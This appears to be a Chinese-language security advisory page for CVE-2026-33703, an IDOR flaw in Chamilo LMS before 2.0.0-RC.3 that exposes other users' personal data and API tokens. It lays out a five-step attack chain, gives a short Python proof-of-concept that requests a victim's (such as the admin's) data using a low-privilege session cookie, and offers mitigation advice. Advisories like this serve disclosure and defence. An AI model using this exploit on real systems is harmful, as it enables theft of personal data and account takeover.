CVE-2026-33703 CVSS 6.5 中危

CVE-2026-33703 Chamilo LMS IDOR漏洞致信息泄露

披露日期: 2026-04-10

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-33703

漏洞类型

不安全的直接对象引用 (IDOR)

CVSS评分

6.5 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Chamilo LMS

漏洞概述

Chamilo LMS是一个学习管理系统。在2.0.0-RC.3版本之前，其/social-network/personal-data/{userId}端点存在不安全的直接对象引用（IDOR）漏洞。由于缺乏对用户ID参数的严格权限验证，任何经过身份验证的用户都可以通过修改userId参数，访问任意用户的完整个人数据和API令牌。这导致敏感信息大规模泄露，可能引发全平台数据泄露风险。该漏洞已在2.0.0-RC.3版本中修复。

技术细节

该漏洞的根本原因在于服务器端未对客户端请求中的userId参数进行充分的权限校验。在受影响版本的Chamilo LMS中，当用户访问/social-network/personal-data/{userId}接口时，系统仅验证了请求者是否已登录，而没有实施访问控制列表（ACL）检查，即未验证请求者是否有权查看目标userId所对应的资源信息。攻击者利用这一IDOR缺陷，只需拥有一个普通低权限账号，即可通过遍历、猜测或暴力破解其他用户的ID（例如将URL中的ID替换为管理员ID），构造特定的HTTP GET请求。由于缺乏对象所有权验证，服务器会直接响应并返回目标用户的完整个人资料、敏感信息以及用于API交互的令牌。这种水平越权漏洞不仅导致了大规模的隐私数据泄露，还允许攻击者利用窃取的API令牌以受害者身份执行操作，从而可能导致全平台的数据被窃取或破坏。

攻击链分析

STEP 1

侦察

攻击者识别出目标系统使用Chamilo LMS，并发现存在/social-network/personal-data/端点。

STEP 2

获取访问权限

攻击者在平台上注册一个普通用户账号，获取有效的会话凭证（Cookie）。

STEP 3

漏洞利用

攻击者使用自己的凭证，修改请求URL中的userId参数为其他用户（如管理员）的ID，发送HTTP GET请求。

STEP 4

数据泄露

服务器返回目标用户的详细个人资料及API令牌，攻击者成功获取敏感信息。

STEP 5

权限提升

攻击者利用窃取的API令牌冒充受害者身份，进行非法操作或进一步渗透。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target URL (Replace with actual target)
target_url = "http://target-chamilo.com/main/social-network/personal-data/{}"

# Attacker's session cookie (Low privilege user)
session_cookies = {
    "PHPSESSID": "attacker_session_id_here"
}

# Target victim user ID (e.g., Admin ID is often 1 or 2)
victim_user_id = "1"

# Send request to exploit IDOR
exploit_url = target_url.format(victim_user_id)
response = requests.get(exploit_url, cookies=session_cookies)

if response.status_code == 200:
    print("Exploit successful! Leaked data:")
    print(response.text)
else:
    print("Exploit failed.")

影响范围

Chamilo LMS < 2.0.0-RC.3

防御指南

临时缓解措施

建议立即升级至修复版本。若无法立即升级，应通过网络访问控制列表（ACL）限制对受影响端点的访问，或部署Web应用防火墙（WAF）检测并阻止针对userId参数的遍历攻击行为，同时加强对异常数据访问的日志监控。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表